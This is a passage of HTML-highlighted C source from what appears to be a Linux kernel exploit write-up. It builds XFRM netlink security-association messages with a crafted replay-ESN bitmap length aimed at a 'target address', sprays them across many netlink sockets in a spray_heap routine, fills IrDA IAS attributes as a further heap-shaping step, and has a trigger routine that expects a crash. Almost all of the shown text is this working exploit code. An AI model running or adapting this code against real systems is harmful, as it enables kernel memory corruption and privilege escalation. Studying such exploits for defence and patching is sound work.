class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">a6<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-129\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">proto<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPPROTO_AH<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-130\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">xsinfo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">spi<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12345<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-131\"><span class=\"crayon-h\">\t<\/span><span 
class=\"crayon-e\">add_attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">XFRMA_MARK<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">mark<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">mark<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-132\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-133\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_algo<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-134\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-o\">!<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-135\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;algo allocation&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-136\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-137\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-138\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_name<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-139\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">strcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_name<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-s\">&quot;hmac(sha256)&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-140\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_key_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-141\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">strncpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">alg_key<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&quot;12345678901234567890123456789012&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">32<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-142\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add_attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">XFRMA_ALG_AUTH<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">algo<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_algo<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">33<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-143\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-144\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* build ens *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-145\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">esn_size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_replay_state_esn<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-146\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-147\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">esn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_replay_state_esn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5bad57622f389003567142-148\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* This is mandatory, in order to let the kernel parse the nlattr structure<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-149\"><span class=\"crayon-c\">\t * if we want to use a specific memory location, we must allocate a memory<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-150\"><span class=\"crayon-c\">\t * with size=target address , which is a 32-bit value<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-151\"><span class=\"crayon-c\">\t *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-152\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">esn<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">bmp_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xfrm_replay_state_esn<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-153\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-154\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">add_attr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">r<\/span><span 
class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">XFRMA_REPLAY_ESN_VAL<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">esn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">esn_size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-155\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-156\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-157\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-158\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-159\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-160\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-161\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trigger<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-162\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;\/proc\/sys\/net\/core\/somaxconn&quot;<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">O_RDONLY<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-163\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-164\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;See crash ? \\n&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-165\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-166\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-167\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">spray_heap<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">u_int8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">u_int32_t <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iter<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-168\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-169\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-170\"><span 
class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newae<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-171\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newsa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-172\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-173\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-174\"><span class=\"crayon-p\">#define SOCKFD 1000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-175\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fds<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">SOCKFD<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-176\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* don&#8217;t make iter &gt;= 1000, or change SOCKFD <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-177\"><span class=\"crayon-c\">\t&nbsp;&nbsp; to a greater value *\/<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-178\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">build_sa_frame<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-179\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">iter<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-180\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_netlink_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-181\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-182\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/\/printf(&#8220;send %dn&#8221;,i);<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5bad57622f389003567142-183\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-184\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fds<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-185\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/* don&#8217;t close fds *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-186\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/\/free(sa); \/* don&#8217;t need to do this*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-187\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-188\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-189\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/free(sa);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-190\"><span 
class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-191\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-192\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_set_ias<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-193\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-194\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_ias_set <\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-195\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-196\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-197\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-198\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-199\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">strncpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_class_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-200\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_attrib_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">'C'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-201\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_attrib_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-202\"><span class=\"crayon-h\">\t<\/span><span 
class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-m\">attribute<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_attrib_octet_seq<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-203\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-204\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-m\">attribute<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_attrib_octet_seq<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">octet_seq<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x41<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1023<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-205\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-206\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-207\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-208\"><span class=\"crayon-h\">\t<\/span><span 
